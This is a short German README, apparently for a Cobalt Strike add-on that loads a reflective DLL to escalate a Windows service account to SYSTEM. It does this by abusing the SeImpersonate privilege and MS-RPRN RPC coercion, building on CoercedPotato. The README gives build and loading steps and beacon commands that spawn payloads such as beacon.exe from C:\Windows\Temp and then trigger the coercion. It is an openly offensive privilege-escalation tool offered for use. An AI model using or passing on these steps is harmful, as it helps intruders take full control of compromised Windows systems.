
Reflektive DLL zur Privilegienerweiterung von NT-Dienst auf SYSTEM mithilfe des SeImpersonateToken-Privilegs
Privilege Escalation von NT-Dienst zu SYSTEM mithilfe des SeImpersonateToken-Privilegs und der MS-RPRN-Funktionen.
Stark basierend auf https://github.com/Prepouce/CoercedPotato
Reflective Loader von https://github.com/stephenfewer/ReflectiveDLLInjection.
Klonen Sie dieses Repository und kompilieren Sie das Projekt in VisualStudio, laden Sie dann dist/coercedpotato.cna in CobaltStrike.
Zuerst müssen Sie den RPC-Listener mit folgendem Befehl starten:
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
zum Beispiel
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
danach können Sie einen SYSTEM-Aufruf auslösen
beacon> CoercedPotato coerce